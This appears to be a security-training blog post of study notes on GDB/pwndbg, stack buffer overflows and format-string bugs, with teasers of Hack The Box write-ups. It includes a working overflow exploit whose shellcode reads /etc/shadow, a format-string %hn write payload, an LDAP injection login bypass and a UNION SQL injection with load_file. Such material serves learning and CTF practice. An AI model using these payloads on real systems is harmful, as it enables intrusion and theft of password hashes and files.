common GDB comand for buffer overflow and format string

This code is from Cyber Star essential training.


Common commands for GDB debugging:

pwndbg> file program //shows the information of the file
pwndbg> info functions //shows the function included
pwndbg> b main //set breakpoint
pwndbg> run // 运行程序
pwndbg> so //step over, run other functions, go to the functions we are interested in
pwndbg> x/s address //show the value of the address as string
pwndbg> x/x address //show the value as hexadecimal stored here, first x is examine, second means hexadecimal 
pwndbg> disassemble main //反编译
pwndbg> run < input //run with the payload


construct payload with python

$ python -c "print '<password_here>'”
$ python -c "print '<password_here>'[::-1]” //reverse密码
$ python -c "print('A' * 200)" > input //construct the payload
$ ./buffer < input //execute with the payload


An easy way to find the crash address:
input a cyclic pattern and find where the program crashes
$ wget https://raw.githubusercontent.com/Svenito/exploit-pattern/master/pattern.py
$ python3 pattern.py 200 //generate a 200-byte cyclic pattern
$ python3 pattern.py 200 > input //construct the payload
$ python3 pattern.py 0x000000 //to find the crush place, 0x000000 is the crush address



Construct the payload, offset is the offset of the crush place. 'BBBB' is the place will trigger the buffer overflow,  if we run the program with this payload, the signal will show 0x424242 which means we successfully find the place we are going to overwrite,

import struct


offset = 96


exploit = ""
exploit += "A" * offset
exploit += "BBBB"
exploit += "C" * 20


print(exploit)

 Ps : remember the little-endian  

Replace ‘BBBB’ with the return address 

Trying to write assembly code:
Write the assembly  code (sample) : \x90 means NOP, just occupy a place, it had no effects and move to next instruction.
The assembly code is printing the contents of the shadow file (including my password hash
If we don’t know the return address’s accurate address, we have to overwrite more than the return address. The NOP fiddle with the memory address and will overwrite the  return addressee and finally execute our assembly code.
import struct


offset = 96
rp = struct.pack("<L", 0x565555c7)


nop = "\x90"


payload = ""
payload += "\x31\xc0\x50\x68\x2f\x63\x61\x74\x68"
payload += "\x2f\x62\x69\x6e\x89\xe3\x50\x68\x61"
payload += "\x64\x6f\x77\x68\x2f\x2f\x73\x68\x68"
payload += "\x2f\x65\x74\x63\x89\xe1\x50\x51\x53"
payload += "\x89\xe1\xb0\x0b\xcd\x80"


exploit = ""
exploit += "A" * offset
exploit += "BBBB"
exploit += nop * 200
exploit += payload


print(exploit)


Mitigations

Stack Protector / Stack Canary:
The stack canary is a value that sits before the return pointer in the stack. If this has been changed, the CPU will terminate the program. 
Bypass canary: if we can find the canary’s value, and overwrite with the expected value.

NX / DEP:
No Execute on Linux, or Data Execution Policy on Windows separates areas of the stack into code and data.
This can also be bypassed

ASLR(Address Space Layout Randomisation😞
our shellcode is constantly changing every time.
This can also be bypassed, but mainly by finding code that ASLR doesn't support (there's almost always some bits).

Format string
How it works?
printf("%s\n", somedata); //normal 
printf(somedata); //without string specifier, the instruction will keep moving to find it on the memoery 
 
If we keep send %8x to get the data from the memory, we read the data from the memory one by one.
The first 4 bytes are the address we are going to overwrite, and then we print some data and find the calculated place we are going to change, N$ is the number of the address we are going to overwrite.

payload sample: 
$(printf "\x9e\xf0\xff\xbf\x9c\xf0\xff\xbf")%49143x%24\$hn%12553x%25\$hn.

Mitigations:
Be careful at the user input code.

Popular posts from this blog

Phonebook - Hack the box Write up -- Web LDAP injection

Image
 0x00 Problem  0x01 Check the vulnerability When we see the login form on the website, it might be command injection, SQL injection, LDAP injection.  We can see that this need us to login with workstation username, it might be LDAP injection. 0x02 LDAP injection payload Here is the basic LDAP injection payload. We can check the vulnerability. user=*)(& password=*)(& --> (&(user=*)(&)(password=*)(&))  After we type it, we found the response shows successful, and return a page has search box. Then we type a character in the search box, and it returns some user phonebook information. I tried 'flag', 'HTB', it doesn't find any results. Then we try to find user 'Reese', but the information doesn't look like flag.   0x03 Locate the flag  Then we change our payload to check if the password is the flag. user=Reese password=HTB*)(& --> (&(user=Reese)(password=HTB*)(&  It can also return to the search page which means it...
Read more

wafwaf -- Hack The Box -- Web SQL injection

Image
0x00 Problem 0x01 Check the Source Code We open the website and only see the source code on the website. As we can see, there is a WAF will filter some characters and words, that means the normal injection will not work. However, we can see, there is a json_decode() function will decode JSON data, that means the data can be accepted should be JSON format.  The example JSON format data is like: /u0074, /u0075. In addition, there is a "php://input",  accesses the read-only stream of the requested raw data, executing the data in the post request as PHP code. 0x02 Local Test We can launch an Apache server to test it. I copy the source code and make a little change to test this. This file is in /var/www/html. We will construct the data first. This time I use 'select' as an example. The word transfer to ASCII, then to hex, then replace the '\0x' as '\u00'. This can be test in the browser console. At the end, we can test it with curl . As we can see, the SQL...
Read more

Time-based SQLMap and Tamper scripts construct

Image
Types of SQLMap: Boolean-based blind:  replaces or appends to the affected parameter in the HTTP request. Alternatively , the user can provide a string or regular expression to match on True pages. Time-based blind:   For each HTTP response, by making a comparison between the HTTP response time with the original request, the tool inference the output of the injected statement character by character.   Error-based:   This technique works only when the web application has been configured to disclose back-end database management system error messages. UNION query-based: UNION ALL SELECT, execute the for loop http://178.62.0.100:32104/portfolio.php?id=1 union all select 1,load_file("/var/www/html/administrat/panel.php),3--  Stacked queries : piggybacking.  it appends to the affected parameter in the HTTP request, a semi-colon ( ; ) followed by the SQL statement to be executed. Time-based blind injection:  How time-based blind injection works? The function ...
Read more